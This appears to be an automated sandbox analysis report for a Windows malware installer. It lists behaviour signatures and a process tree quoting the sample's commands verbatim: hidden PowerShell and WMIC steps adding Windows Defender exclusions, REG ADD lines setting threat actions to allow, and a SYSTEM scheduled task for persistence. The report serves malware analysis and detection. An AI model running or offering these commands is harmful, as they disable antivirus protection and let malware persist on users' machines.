Analysis

  • max time kernel
    199s
  • max time network
    298s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    25-07-2024 22:47

General

  • Target

    b40a5caa0f507fa2b1634fccf7047d562571369afdce42a587e94bed8a8adeae.exe

  • Size

    7.3MB

  • MD5

    5c9138505f0a295a9a49220db9d798d6

  • SHA1

    f65d42169ecdb3766231fff66ea7960f5e63bd4c

  • SHA256

    b40a5caa0f507fa2b1634fccf7047d562571369afdce42a587e94bed8a8adeae

  • SHA512

    ec1ccfb469da321da0de2ecc8f465dd71574290e1da31d35e84991786a786ea2e9f4bc330182cf8362cfefa8ca7e7b90aea62b6ecb570b0c5d552a8fc420d77f

  • SSDEEP

    196608:91Oeun7/4jc40roI18bFT20eIRrGJdK3V0A2ZtspTr:3Oeugc4bIzIRrGictsVr

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 2 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 33 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b40a5caa0f507fa2b1634fccf7047d562571369afdce42a587e94bed8a8adeae.exe
    "C:\Users\Admin\AppData\Local\Temp\b40a5caa0f507fa2b1634fccf7047d562571369afdce42a587e94bed8a8adeae.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2424
    • C:\Users\Admin\AppData\Local\Temp\7zS7CA2.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2132
      • C:\Users\Admin\AppData\Local\Temp\7zS7E96.tmp\Install.exe
        .\Install.exe /LdidjFIm "385132" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2660
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
          4⤵
          • Indirect Command Execution
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3276
          • C:\Windows\SysWOW64\cmd.exe
            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4576
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4364
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:5008
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "brlRsAdJaeHYbaQPPR" /SC once /ST 22:49:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS7E96.tmp\Install.exe\" NQ /quPIdiduo 385132 /S" /V1 /F
          4⤵
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:3976
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 796
          4⤵
          • Program crash
          PID:4864
  • C:\Users\Admin\AppData\Local\Temp\7zS7E96.tmp\Install.exe
    C:\Users\Admin\AppData\Local\Temp\7zS7E96.tmp\Install.exe NQ /quPIdiduo 385132 /S
    1⤵
    • Executes dropped EXE
    • Drops desktop.ini file(s)
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Modifies data under HKEY_USERS
    • Suspicious use of WriteProcessMemory
    PID:3712
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
      2⤵
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3188
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1128
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3800
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3364
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1336
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2444
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:480
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1428
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4116
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5036
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
        3⤵
          PID:3388
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1016
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
          3⤵
            PID:2164
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
            3⤵
              PID:4352
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
              3⤵
              • System Location Discovery: System Language Discovery
              PID:4568
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
              3⤵
                PID:3124
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4252
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4244
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4236
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                3⤵
                • System Location Discovery: System Language Discovery
                PID:2384
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                3⤵
                • System Location Discovery: System Language Discovery
                PID:1936
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                3⤵
                • System Location Discovery: System Language Discovery
                PID:1988
              • C:\Windows\SysWOW64\reg.exe
                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                3⤵
                  PID:2044
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:68
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:304
                • C:\Windows\SysWOW64\reg.exe
                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                  3⤵
                    PID:2776
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                    3⤵
                      PID:196
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:3404
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:312
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:2188
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CpQtmNKkksTvAkviLhR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CpQtmNKkksTvAkviLhR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FHBoolplFmUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FHBoolplFmUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OfCUcdUmBfXwC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OfCUcdUmBfXwC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QAWIpintGGMU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QAWIpintGGMU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cIeibrkhU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cIeibrkhU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\GnOWEelXRQHUOVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\GnOWEelXRQHUOVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\fasQHflodNqIPjZRI\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\fasQHflodNqIPjZRI\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\yUEvGNAcZIxQcBNL\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\yUEvGNAcZIxQcBNL\" /t REG_DWORD /d 0 /reg:64;"
                    2⤵
                    • Drops file in System32 directory
                    • System Location Discovery: System Language Discovery
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4060
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CpQtmNKkksTvAkviLhR" /t REG_DWORD /d 0 /reg:32
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1880
                      • C:\Windows\SysWOW64\reg.exe
                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CpQtmNKkksTvAkviLhR" /t REG_DWORD /d 0 /reg:32
                        4⤵
                        • System Location Discovery: System Language Discovery
                        PID:3336
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CpQtmNKkksTvAkviLhR" /t REG_DWORD /d 0 /reg:64
                      3⤵
                        PID:5040
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FHBoolplFmUn" /t REG_DWORD /d 0 /reg:32
                        3⤵
                          PID:4556
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FHBoolplFmUn" /t REG_DWORD /d 0 /reg:64
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:4380
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OfCUcdUmBfXwC" /t REG_DWORD /d 0 /reg:32
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:5056
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OfCUcdUmBfXwC" /t REG_DWORD /d 0 /reg:64
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:4724
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QAWIpintGGMU2" /t REG_DWORD /d 0 /reg:32
                          3⤵
                            PID:1044
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QAWIpintGGMU2" /t REG_DWORD /d 0 /reg:64
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:4584
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cIeibrkhU" /t REG_DWORD /d 0 /reg:32
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:924
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cIeibrkhU" /t REG_DWORD /d 0 /reg:64
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:2272
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\GnOWEelXRQHUOVVB /t REG_DWORD /d 0 /reg:32
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:1328
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\GnOWEelXRQHUOVVB /t REG_DWORD /d 0 /reg:64
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:5100
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:3108
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:4152
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\fasQHflodNqIPjZRI /t REG_DWORD /d 0 /reg:32
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:4620
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\fasQHflodNqIPjZRI /t REG_DWORD /d 0 /reg:64
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:620
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\yUEvGNAcZIxQcBNL /t REG_DWORD /d 0 /reg:32
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:3976
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\yUEvGNAcZIxQcBNL /t REG_DWORD /d 0 /reg:64
                            3⤵
                              PID:4824
